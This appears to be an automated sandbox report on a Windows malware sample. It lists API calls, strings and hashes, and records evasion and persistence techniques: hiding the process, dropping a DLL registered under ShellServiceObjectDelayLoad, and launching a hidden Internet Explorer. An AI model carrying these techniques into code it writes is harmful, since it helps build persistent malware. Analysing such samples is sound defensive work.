                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oglabl32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-152415183
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
